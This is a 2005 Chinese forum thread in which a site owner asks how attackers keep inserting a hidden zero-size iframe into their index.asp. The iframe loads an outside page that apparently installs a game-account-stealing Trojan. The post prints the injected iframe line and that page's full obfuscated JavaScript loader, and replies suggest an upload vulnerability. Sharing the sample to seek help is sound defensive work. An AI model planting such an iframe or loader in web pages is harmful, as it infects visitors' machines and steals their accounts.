网站屡遭黑客修改,请高人指点

dingo 2005-06-12 08:23:02
最近我的网站总被人修改,index.asp中加入一句:
<iframe src="http://www.jianghu520.cn/style.htm" width="0" height="0"></iframe>
该网址加载后机器被植入木马,好像是传奇盗号木马
令我不解的是,我的网站到底是通过什么途径被人修改的?我一直怀疑是虚拟主机服务商出的问题,因为刚换的空间,以前从没有过问题,再或许是自己FTP上传时的漏洞?
我租用的空间是ASP,ACCESS,PHP,ASP.net均支持的空间,自己用ASP写的页面,功能比较简单无非是留言板,图片上船等功能。用作好友的交流,访问量不大,只限朋友和同学。
由于本人才疏学浅,现请教高人指点,style.htm代码如下:

<html><head><Meta Name=Encoder Content=cirock>
<script language="javascript"><!--
oO68="m438omB\`\!t31",yQ69="4mooE\`B";8.859754E-02,dJ48=".8198819",yQ69='\"\^4\,\[\$\*\)\}\n\+Vg\|r6\?d\;W7Si\(M\:TQv\%\!ma\@\{ot1ycAw9s\rOPH\#LRBXE5F\~Iq8J0\\\<kleZz\-UnG\.D3\&\>Kj2pY\/Cbf\ u\_\'N\`hx\=\]',oO68='z\^G\.\;d\?B8\"C\$\+\<Fanc\|Aw\}uWpR\@L1fTE6HeU5\-2\]\:\`\>\)VxykXSlM7m9\ NDYv3ho\&r\=\[K\n\'\rI\#\(i\~0O\\\%bPj\,\/s\*\_\{JtQq4\!gZ';function dY24(yW35){"4\)B33omE",l=yW35.length;'i\)n0P\)n3',w='';while(l--)"\)41QEBoo\!t31",o=oO68.indexOf(yW35.charAt(l)),'i\}2\}200n',w=(o==-1?yW35.charAt(l):yQ69.charAt(o))+w;"41B\`EQ3E",oO68=oO68.substring(1)+oO68.charAt(0),document.write(w);'i\)o20PP\ '};dY24("\&\)\]FuP5\_\=6I\+\{6\+\[g\%616\)\]FuP5Os\@\>vgvG9\~\|\nxbhgGGG\>\|\|J\=u\]\[I\)\[cJ5UJgz\@m\:p\_uy\:z\|\&\,\)\]FuP5O")//--></script><SCRIpT laNGUage=JavAsCriPt>dY24("xCrXLRl\\xCr\!KH\|\\rlYq\%\{\!aK\_Z\^\[\!g\]KgKibj\<\^\{aK\[ZV\-\]\[KV\!KK\-\{\-\]jKZ\-Kg\-\/\:VV\\xCr\/\!KH\|\\xCr7y\~\,\\xCr\~Y\+\{V\-\]\[KZ\^\~Yukl\`\,\@\{\#5\#K\^\\xCry7h9sL\{W\|Z\:\:\:\-f\{\-\]jKZHjj\[W\:H\-W5\#\/g\r5\[K5\*bK\:\-\{xC\:\[HVVW\|Z\:\[VW\|\@H\|\*33oHn\r\|3\_\_\r22\:\_\r\)0\}\}\rooHHoo0\*\}H22\\rk\`M\`R\{q\`R9Z\^s566H\#\|\^\{\+\`lI9Z\^MK\[H\-K\|\{L5jW\:V\;\{R9qI\^\\rk\`M\`R\{q\`R9Z\^wW\#\|5\>\^\{\+\`lI9Z\^\?\<\[5\*H\[tW\_\[\^\\rk\`M\`R\{q\`R9Z\^Y\-K62\^\{\+\`lI9Z\^\:566H\#\|A\_W\[K\@\/\/s\@\&wYq\~ywu\&XK\[j\&HjjVi\:\!6\^\\r\/y7h9sL\\xCry7h9sL\{W\|Z\'\<\|VV\{\-\]jKZHjj\[W\:H\-W5\#\/g\r5\[K5\*bK\:\-\{xC\:\[HVVW\|Z\:\[VW\|\@H\|\*33oHn\r\|3\_\_\r22\:\_\r\)0\}\}\rooHHoo0\*\}H22\\rk\`M\`R\{q\`R9Z\^s566H\#\|\^\{\+\`lI9Z\^MK\[H\-K\|\{L5jW\:V\;\{R9qI\^\\rk\`M\`R\{q\`R9Z\^wW\#\|5\>\^\{\+\`lI9Z\^\?\<\[5\*H\[tW\_\[\^\\rk\`M\`R\{q\`R9Z\^Y\-K62\^\{\+\`lI9ZQ\:566H\#\|AbHfHV\:aWj\-\@KfH\[p\^\|5\:J6K\#\-i\>aW\-Kp\&\^rusMYkL\{\[H\#\<JH\<KZ\&\&\&\^bHfHu\:aWj\-\&\&\&\^\{Va\:Z\&\&\&\^\!\-\-j\@\/\/\>\>\>ibWH\#\<\!J\ Poi\:\#\/\[\!i\<W\_\&\&\&\^\&\^\$u\-aW\#\<i\_a56s\!Has5\|KpnP8\$\&\^r\/usM\&\^\$\&\^YkL\&\^\$u\-aW\#\<i\_a56s\!Has5\|KpnP88\^8Q\\r\/y7h9sL\\r\/\~Y\+\\xCrusMYkL\\\:\:\:\-fis\[W\:\=p8AVK\-LW6K5J\-p\^\'\<\|VVis\[W\:\=p8A\^\;o8Ar\/usMYkL\\xCr\/7y\~\,\\r\/XLRl\\xCxC")</script></head><body><noscript><b><font color=red>丫的别看了。能解出来我就送你了, </font></b></noscript></body></html>
...全文
255 10 打赏 收藏 转发到动态 举报
写回复
用AI写文章
10 条回复
切换为时间正序
请发表友善的回复…
发表回复
sandzxj 2005-07-31
  • 打赏
  • 举报
回复
去备案报警 呵呵
  • 打赏
  • 举报
回复
程序一定也有问题,不要动不动就说人家服务器有问题
daniel_liyanming 2005-07-25
  • 打赏
  • 举报
回复
关注一下吧
dingo 2005-06-13
  • 打赏
  • 举报
回复
To:okmax(阿满)
人品绝对没问题啊,自己用的网站我可从来不到处做广告,只不过

To:dnscn(金星)
原来真的是上传漏洞,好久不关注动网,这么大的事我居然不知道,惭愧啊惭愧,看来以后要加强学习
wgd 2005-06-13
  • 打赏
  • 举报
回复
可能是服务器那边的问题
okmax 2005-06-13
  • 打赏
  • 举报
回复
有时候发生这种事,并非那些黑客和你过意不去.

关键你厚不厚道,有没有到处乱帖乱发广告.

wangflove 2005-06-13
  • 打赏
  • 举报
回复
该不会是用正则写的吧?
那位正则的高手看一下吧!

(这可太强了,我......)
dnscn 2005-06-13
  • 打赏
  • 举报
回复
估计你的程序有上传漏洞 被人传了ASP木马
iamgsyy 2005-06-12
  • 打赏
  • 举报
回复
关注

不过他能改你的页面,就说是服务器那边有问题

已经可以操作文件了.
dingo 2005-06-12
  • 打赏
  • 举报
回复
急求对策,Email: zr_7777777@sina.com
深表感谢!

5,655

社区成员

发帖
与我相关
我的任务
社区描述
Web开发应用服务器相关讨论专区
社区管理员
  • 应用服务器社区
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧